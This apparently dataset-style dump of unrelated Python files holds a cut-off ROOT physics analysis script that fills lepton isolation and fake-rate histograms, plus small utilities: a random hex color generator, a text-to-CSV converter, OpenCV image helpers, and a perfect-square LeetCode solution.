sr.histos['muisoL' ] = ROOT.TH1F('muIsoL_' +sr.name+'_'+sample.name, 'muIsoL_' +sr.name+'_'+sample.name, 40, 0., 1.0)
sr.histos['muisoTLT'] = ROOT.TH1F('muIsoTLT_'+sr.name+'_'+sample.name, 'muIsoTLT_'+sr.name+'_'+sample.name, 40, 0., 1.0)
sr.histos['muisoTLL'] = ROOT.TH1F('muIsoTLL_'+sr.name+'_'+sample.name, 'muIsoTLL_'+sr.name+'_'+sample.name, 40, 0., 1.0)
sr.histos['muip' ] = ROOT.TH1F('muIP_' +sr.name+'_'+sample.name, 'muIP_' +sr.name+'_'+sample.name, 40, 0., 0.1)
sr.histos['muipTL' ] = ROOT.TH1F('muIPTL_' +sr.name+'_'+sample.name, 'muIPTL_' +sr.name+'_'+sample.name, 40, 0., 0.1)
## electrons
sr.histos['eliso' ] = ROOT.TH1F('elIso_' +sr.name+'_'+sample.name, 'elIso_' +sr.name+'_'+sample.name, 20, 0., 0.6)
sr.histos['elisoTL' ] = ROOT.TH1F('elIsoTL_' +sr.name+'_'+sample.name, 'elIsoTL_' +sr.name+'_'+sample.name, 20, 0., 0.6)
sr.histos['elisoT' ] = ROOT.TH1F('elIsoT_' +sr.name+'_'+sample.name, 'elIsoT_' +sr.name+'_'+sample.name, 20, 0., 0.6)
sr.histos['elisoL' ] = ROOT.TH1F('elIsoL_' +sr.name+'_'+sample.name, 'elIsoL_' +sr.name+'_'+sample.name, 20, 0., 0.6)
sr.histos['elisoTLT'] = ROOT.TH1F('elIsoTLT_'+sr.name+'_'+sample.name, 'elIsoTLT_'+sr.name+'_'+sample.name, 20, 0., 0.6)
sr.histos['elisoTLL'] = ROOT.TH1F('elIsoTLL_'+sr.name+'_'+sample.name, 'elIsoTLL_'+sr.name+'_'+sample.name, 20, 0., 0.6)
sr.histos['elip' ] = ROOT.TH1F('elIP_' +sr.name+'_'+sample.name, 'elIP_' +sr.name+'_'+sample.name, 20, 0., 0.1)
sr.histos['elipTL' ] = ROOT.TH1F('elIPTL_' +sr.name+'_'+sample.name, 'elIPTL_' +sr.name+'_'+sample.name, 20, 0., 0.1)
for key, value in sr.histos.items():
value.Sumw2()
## loop over the tree
for evt in sample.tree:
i += 1
if i > maxev:
continue
if trigger and evt.passTrigger == 0: continue
weight = evt.lumiW
type = evt.type
if type > 2:
type -= 3
if not evt.type in [0, 2]: continue # look only at mumu and elel
for sr in sample.regions:
if not helper.passRegion(sr.name, evt): continue
## Fill the muons isolation for both muons regardless of tight/loose, but same-sign
if evt.type in [0]:
sr.histos['muiso' ].Fill(evt.iso1, weight*evt.puW)
sr.histos['muiso' ].Fill(evt.iso2, weight*evt.puW)
sr.histos['muisoT' ].Fill(evt.iso1 if evt.iso1 <= evt.iso2 else evt.iso2, weight*evt.puW)
sr.histos['muisoL' ].Fill(evt.iso2 if evt.iso1 <= evt.iso2 else evt.iso1, weight*evt.puW)
sr.histos['muip' ].Fill(evt.ip1 , weight*evt.puW)
sr.histos['muip' ].Fill(evt.ip2 , weight*evt.puW)
if evt.tlcat in [1,2]:
sr.histos['muisoTL' ].Fill(evt.iso1, weight*evt.puW)
sr.histos['muisoTL' ].Fill(evt.iso2, weight*evt.puW)
sr.histos['muisoTLT'].Fill(evt.iso1 if evt.iso1 <= evt.iso2 else evt.iso2, weight*evt.puW)
sr.histos['muisoTLL'].Fill(evt.iso2 if evt.iso1 <= evt.iso2 else evt.iso1, weight*evt.puW)
sr.histos['muipTL' ].Fill(evt.ip1 , weight*evt.puW)
sr.histos['muipTL' ].Fill(evt.ip2 , weight*evt.puW)
if evt.type in [1]:
sr.histos['muiso'].Fill(evt.iso1, weight*evt.puW)
sr.histos['eliso'].Fill(evt.iso2, weight*evt.puW)
if evt.type in [2]:
sr.histos['eliso' ].Fill(evt.iso1, weight*evt.puW)
sr.histos['eliso' ].Fill(evt.iso2, weight*evt.puW)
sr.histos['elisoT' ].Fill(evt.iso1 if evt.iso1 <= evt.iso2 else evt.iso2, weight*evt.puW)
sr.histos['elisoL' ].Fill(evt.iso2 if evt.iso1 <= evt.iso2 else evt.iso1, weight*evt.puW)
sr.histos['elip' ].Fill(evt.ip1 , weight*evt.puW)
sr.histos['elip' ].Fill(evt.ip2 , weight*evt.puW)
if evt.tlcat in [1,2]:
sr.histos['elisoTL'].Fill(evt.iso1, weight*evt.puW)
sr.histos['elisoTL'].Fill(evt.iso2, weight*evt.puW)
sr.histos['elisoTLT'].Fill(evt.iso1 if evt.iso1 <= evt.iso2 else evt.iso2, weight*evt.puW)
sr.histos['elisoTLL'].Fill(evt.iso2 if evt.iso1 <= evt.iso2 else evt.iso1, weight*evt.puW)
sr.histos['elipTL' ].Fill(evt.ip1 , weight*evt.puW)
sr.histos['elipTL' ].Fill(evt.ip2 , weight*evt.puW)
sr.cats[type].npp += evt.npp*weight
sr.cats[type].npf += evt.npf*weight
sr.cats[type].nfp += evt.nfp*weight
sr.cats[type].nff += evt.nff*weight
sr.cats[type].npp2 += evt.npp*evt.npp*weight*weight
sr.cats[type].npf2 += evt.npf*evt.npf*weight*weight
sr.cats[type].nfp2 += evt.nfp*evt.nfp*weight*weight
sr.cats[type].nff2 += evt.nff*evt.nff*weight*weight
if evt.tlcat is 0:
sr.cats[type].ntt +=weight
sr.cats[type].ntt2 +=weight*weight
sr.cats[type].nttc +=1
elif evt.tlcat is 1:
sr.cats[type].ntl +=weight
sr.cats[type].ntl2 +=weight*weight
sr.cats[type].ntlc +=1
elif evt.tlcat is 2:
sr.cats[type].nlt +=weight
sr.cats[type].nlt2 +=weight*weight
sr.cats[type].nltc +=1
elif evt.tlcat is 3:
sr.cats[type].nll +=weight
sr.cats[type].nll2 +=weight*weight
sr.cats[type].nllc +=1
for sys in ['nom', 'jesup', 'jesdn', 'jer', 'bup', 'bdn']:
for var in ['met', 'ht', 'nj', 'nb']:
val = helper.getValue(var, sys, evt)
maxval = sr.cats[type].histos[sys][var]['tt'].GetXaxis().GetXmax()
if evt.tlcat is 0:
sr.cats[type].histos[sys][var]['tt'].Fill(val if val < maxval else maxval - 0.0001, weight)
elif evt.tlcat is 1:
sr.cats[type].histos[sys][var]['tl'].Fill(val if val < maxval else maxval - 0.0001, weight)
elif evt.tlcat is 2:
sr.cats[type].histos[sys][var]['tl'].Fill(val if val < maxval else maxval - 0.0001, weight)
elif evt.tlcat is 3:
sr.cats[type].histos[sys][var]['ll'].Fill(val if val < maxval else maxval - 0.0001, weight)
sample.loaded = True
for sample in samples:
if not os.path.isfile('samples/'+sample.name+'.pk'):
pickle.dump(sample, open('samples/'+sample.name+'.pk','wb'), pickle.HIGHEST_PROTOCOL)
## adding up all the samples
totals = helper.sample('total','')
for sample in samples:
if sample.isdata: continue
totals += sample
samples.append(totals)
loaded = True
def isoplots(region):
ROOT.gROOT.SetBatch()
reg = SRs.index(region)
for key in samples[0].regions[reg].histos.keys():
if not key in ['muiso', 'muisoT', 'muisoL', 'muisoTL', 'muisoTLT', 'muisoTLL', 'muip', 'muipTL',
'eliso', 'elisoT', 'elisoL', 'elisoTL', 'elisoTLT', 'elisoTLL', 'elip', 'elipTL' ]: continue
if 'mu' in key:
mulegend = lib.makeLegend(0.4, 0.6, 0.6, 0.87)
mulegend.SetTextSize(0.04)
mumcstack = ROOT.THStack('mumcstack', 'mumcstack')
mumcint = 0.
if 'el' in key:
ellegend = lib.makeLegend(0.6, 0.6, 0.8, 0.8)
ellegend.SetTextSize(0.04)
elmcstack = ROOT.THStack('elmcstack', 'elmcstack')
elmcint = 0.
for sample in samples:
if sample == totals or sample.isdata: continue
#muons
if 'mu' in key:
sample.regions[reg].histos[key].SetFillColor(sample.color)
mumcint += sample.regions[reg].histos[key].Integral()
mumcstack.Add(sample.regions[reg].histos[key])
mulegend.AddEntry(sample.regions[reg].histos[key], sample.name, 'f')
#electrons
if 'el' in key:
sample.regions[reg].histos[key].SetFillColor(sample.color)
elmcint += sample.regions[reg].histos[key].Integral()
elmcstack.Add(sample.regions[reg].histos[key])
ellegend.AddEntry(sample.regions[reg].histos[key], sample.name, 'f')
if 'mu' in key:
mulegend.AddEntry(doublemu.regions[reg].histos[key], doublemu.name, 'pe')
mufunc = helper.canvasWithRatio(mumcstack, doublemu.regions[reg].histos[key], mulegend)
cmu = mufunc[0] #don't ask me why this is necessary
cmu.Update()
cmu.Draw()
helper.saveAll(cmu, 'figs/'+key+'_sideband_'+samples[0].regions[reg].name)
if 'el' in key:
ellegend.AddEntry(doubleel.regions[reg].histos[key], doubleel.name, 'pe')
elfunc = helper.canvasWithRatio(elmcstack, doubleel.regions[reg].histos[key], ellegend)
cel = elfunc[0] #don't ask me why this is necessary
cel.Update()
cel.Draw()
helper.saveAll(cel, 'figs/'+key+'_sideband_'+samples[0].regions[reg].name)
return
incQCD = False
def kinematicDistributions(region):
ROOT.gROOT.SetBatch()
for var in samples[0].regions[0].mm.histos['nom'].keys():
print 'at variable:', var
for t in ['tt', 'tl', 'll']:
print 'at type:', t
for sys in ['nom', 'jesup', 'jesdn', 'jer', 'bup', 'bdn']:
print 'at systematic:', sys
legend = lib.makeLegend(0.6, 0.6, 0.8, 0.87)
legend.SetTextSize(0.04)
mcstack = ROOT.THStack('mcstack', 'mcstack')
mcint = 0.
for sample in samples:
if incQCD == False:
if 'qcd' in sample.name: continue
if sample == totals or sample.isdata: continue
#
reg = SRs.index(region)
print sample.name
sample.regions[reg].mm.histos[sys][var][t].SetFillColor(sample.color)
mcint += sample.regions[reg].mm.histos[sys][var][t].Integral()
mcstack.Add(sample.regions[reg].mm.histos[sys][var][t])
legend.AddEntry(sample.regions[reg].mm.histos[sys][var][t], sample.name, 'f')
legend.AddEntry(doublemu.regions[reg].mm.histos[sys][var][t], doublemu.name, 'pe')
func = helper.canvasWithRatio(mcstack, doublemu.regions[reg].mm.histos[sys][var][t], legend)
c = func[0] #don't ask me why this is necessary
print c.ls()
c.Update()
c.FindObject('ratio').GetXaxis().SetTitle(helper.getLatexVariable(var))
c.FindObject('mcstack').SetTitle(helper.getLatexType(t))
c.Draw()
helper.saveAll(c, 'figs/'+var+'_'+doublemu.regions[reg].name+'_'+sys+'_'+t)
return
def printout():
for sample in samples:
for region in sample.regions:
for cat in region.cats:
cat.fakes = cat.npf+cat.nfp+cat.nff
cat.obs = cat.ntt
cat.ntte , cat.ntle , cat.nlte , cat.nlle = math.sqrt(cat.ntt2), math.sqrt(cat.ntl2), math.sqrt(cat.nlt2), math.sqrt(cat.nll2)
cat.nttce, cat.ntlce, cat.nltce, cat.nllce = math.sqrt(cat.nttc), math.sqrt(cat.ntlc), math.sqrt(cat.nltc), math.sqrt(cat.nllc)
cat.nppe , cat.npfe , cat.nfpe , cat.nffe = math.sqrt(cat.npp2), math.sqrt(cat.npf2), math.sqrt(cat.nfp2), math.sqrt(cat.nff2)
cat.fakese = cat.npfe+cat.nfpe+cat.nffe
cat.obse = cat.ntte
for r in range(len(SRs)):
for i in range(3): ## loop on all the categories
print i
print '\n\n\n'
print '=============================================================================================================='
print ' CATEGORY:', samples[0].regions[r].cats[i].name
print '=============================================================================================================='
print '%10s | %10s%9s | %10s%9s | %10s%9s | %10s%9s || %10s%9s' %('SAMPLE', 'NTT','', 'NTL','', 'NLT','', 'NLL','', 'SUM','')
print '--------------------------------------------------------------------------------------------------------------'
for sample in samples:
if sample.name == 'total': continue
if samples.index(sample) == len(samples) -1:
print '--------------------------------------------------------------------------------------------------------------'
print '%10s | %10.2f +- %5.2f | %10.2f +- %5.2f | %10.2f +- %5.2f | %10.2f +- %5.2f || %10.2f +- %5.2f' %(
sample.name, sample.regions[r].cats[i].ntt, sample.regions[r].cats[i].ntte, sample.regions[r].cats[i].ntl, sample.regions[r].cats[i].ntle, sample.regions[r].cats[i].nlt, sample.regions[r].cats[i].nlte, sample.regions[r].cats[i].nll, sample.regions[r].cats[i].nlle, sample.regions[r].cats[i].ntt+sample.regions[r].cats[i].ntl+sample.regions[r].cats[i].nlt+sample.regions[r].cats[i].nll, sample.regions[r].cats[i].ntte+sample.regions[r].cats[i].ntle+sample.regions[r].cats[i].nlte+sample.regions[r].cats[i].nlle)
print '--------------------------------------------------------------------------------------------------------------'
print '--------------------------------------------------------------------------------------------------------------'
print '%10s | %10s%9s | %10s%9s | %10s%9s | %10s%9s || %10s%9s' %('SAMPLE', 'NPP','', 'NPF','', 'NFP','', 'NFF','', 'SUM','')
print '--------------------------------------------------------------------------------------------------------------'
for sample in samples:
if sample.name == 'total': continue
if samples.index(sample) == len(samples) -1:
print '--------------------------------------------------------------------------------------------------------------'
print '%10s | %10.2f +- %5.2f | %10.2f +- %5.2f | %10.2f +- %5.2f | %10.2f +- %5.2f || %10.2f +- %5.2f' %(
sample.name, sample.regions[r].cats[i].npp, sample.regions[r].cats[i].nppe, sample.regions[r].cats[i].npf, sample.regions[r].cats[i].npfe, sample.regions[r].cats[i].nfp, sample.regions[r].cats[i].nfpe, sample.regions[r].cats[i].nff, sample.regions[r].cats[i].nffe, sample.regions[r].cats[i].npp+sample.regions[r].cats[i].npf+sample.regions[r].cats[i].nfp+sample.regions[r].cats[i].nff, sample.regions[r].cats[i].nppe+sample.regions[r].cats[i].npfe+sample.regions[r].cats[i].nfpe+sample.regions[r].cats[i].nffe)
#print '--------------------------------------------------------------------------------------------------------------'
#print 'OBSERVED : %.2f +- %.2f' %(totals.regions[r].cats[i].obs , totals.regions[r].cats[i].ntte)
#print 'SUM OF FAKES : %.2f +- %.2f' %(totals.regions[r].cats[i].fakes, totals.regions[r].cats[i].npfe+totals.regions[r].cats[i].nfpe+totals.regions[r].cats[i].nffe)
#if totals.cats[i].obs > 0:
# res = helper.divWithErr(totals.regions[r].cats[i].fakes, totals.regions[r].cats[i].fakese, totals.regions[r].cats[i].obs, totals.regions[r].cats[i].obse)
# relres = helper.divWithErr(totals.regions[r].cats[i].fakes - totals.regions[r].cats[i].obs, totals.regions[r].cats[i].fakese - totals.regions[r].cats[i].obse, totals.regions[r].cats[i].fakes, totals.regions[r].cats[i].fakese)
#else:
# res = [0,0]
# relres = [0,0]
#print '\n------------------------------------------'
#print '%25s %.3f +- %.3f' %('pred./ obs.:', res[0], res[1])
#print '\n%25s %.3f +- %.3f' %('(pred. - obs.) / pred.:', relres[0], relres[1])
#print '------------------------------------------'
#
# print '\n \nPURE COUNTS:'
# print '%10s%9s | %10s%9s | %10s%9s | %10s%9s || %10s%9s' %('NTT','', 'NTL','', 'NLT','', 'NLL','', 'SUM','')
# print '--------------------------------------------------------------------------------------------------------------'
# if samples.index(sample) == len(samples) -1:
# print '--------------------------------------------------------------------------------------------------------------'
# print '%10.2f +- %5.2f | %10.2f +- %5.2f | %10.2f +- %5.2f | %10.2f +- %5.2f || %10.2f +- %5.2f' %(
# sample.cats[i].nttc, sample.cats[i].nttce, sample.cats[i].ntlc, sample.cats[i].ntlce, sample.cats[i].nltc, sample.cats[i].nltce, sample.cats[i].nllc, sample.cats[i].nllce, sample.cats[i].nttc+sample.cats[i].ntlc+sample.cats[i].nltc+sample.cats[i].nllc, sample.cats[i].nttce+sample.cats[i].ntlce+sample.cats[i].nltce+sample.cats[i].nllce)
#
sample.file.Close()
if __name__ == '__main__':
print 'in function main'
#printout()
#kinematicDistributions()
#isoplots()
|
22,096 | 0cbcdd4950e46dae335171f0e095fce813d6b754 | import random
nums=["0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f"]
a1 = random.choice(nums)
a2 = random.choice(nums)
a3 = random.choice(nums)
a4 = random.choice(nums)
a5 = random.choice(nums)
a6 = random.choice(nums)
fgcolor = "#" + a1 + a2 + a3 + a4 + a5 + a6
print(fgcolor) |
22,097 | 8306f48914831695fec6ef84179d9cec110610a9 | #-*- coding: utf-8 -*-
def get_lines(filepath):
with open(filepath + '.txt') as file_object:
lines = list(file_object.readlines())
return lines
def new_csv(lines, filepath):
fileindex = 0
fp = open(filepath + '.csv', 'w')
count = len(lines)
print("总行数:" + str(count))
for index, line in enumerate(lines):
index += 1
# print(str(index)+' : '+line)
oneline = line.strip() # 逐行读取,剔除空白
fp.write(oneline) # 写文件
fp.write('\n')
fp.close()
if __name__ == "__main__":
filepath = "demo_airhistory"
lines = get_lines(filepath)
new_csv(lines, filepath) |
22,098 | 4725f074c9c78bd6c4d55f3a598fe8cd249782a8 | import os
import cv2
def create_folder(directory):
try:
if not os.path.exists(directory):
os.makedirs(directory)
except OSError:
print('Error: Creating directory. ' + directory)
def read_image(input_image):
'''
function to read an image and return OpenCV object
'''
try:
image = cv2.imread(input_image)
except AttributeError:
print(f"Input file '{input_image}' is not valid.")
except Exception as e:
print(e)
return image
def show_image_opencv(image_instance, name="Image in OpenCV"):
'''
function to show an image in OpenCV popup
'''
try:
cv2.imshow(name, image_instance)
cv2.waitKey(0)
cv2.destroyAllWindows()
except Exception as e:
print(e)
def save_image_opencv(image_instance, img_name):
'''
save a file from OpenCV image instance.
'''
create_folder('img_output')
target_name = os.path.join('img_output',
"{}.jpg".format(img_name))
try:
cv2.imwrite(target_name, image_instance)
except Exception as e:
print(e)
|
22,099 | 7e3006e20ed8c437be9b193898a1f799dc6f4f24 | # 367 Valid Perfect Square
class Solution(object):
def isPerfectSquare(self, num):
"""
:type num: int
:rtype: bool
"""
powerOfTwo = []
base = 1
while base*base <= num:
powerOfTwo.append(base)
base *= 2
root = base/2
if root*root == num:
return True
for i in range(len(powerOfTwo)-2, -1, -1):
sq = (root+powerOfTwo[i]) * (root+powerOfTwo[i])
if sq == num:
return True
elif sq < num:
root += powerOfTwo[i]
return False
def isPerfectSquare2(self, num):
# binary search
low, high = 1, num
while low <= high:
mid = low + (high - low)/2
sq = mid * mid
if sq > num:
high = mid - 1
elif sq < num:
low = mid + 1
else:
return True
return False
def isPerfectSquare3(self, num):
# Newton method
if num == 1:
return 0
t = num/2 # or, init t = num, and remove the num == 1 check
while t * t > num:
t = (t + num/t)/2
return t*t == num
def main():
sol = Solution()
#print sol.isPerfectSquare(0) # True
print sol.isPerfectSquare(1) # True
print sol.isPerfectSquare(4) # True
print sol.isPerfectSquare(9) # True
print sol.isPerfectSquare(6) # False
print sol.isPerfectSquare(2**30) # True
if __name__ == '__main__':
main() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.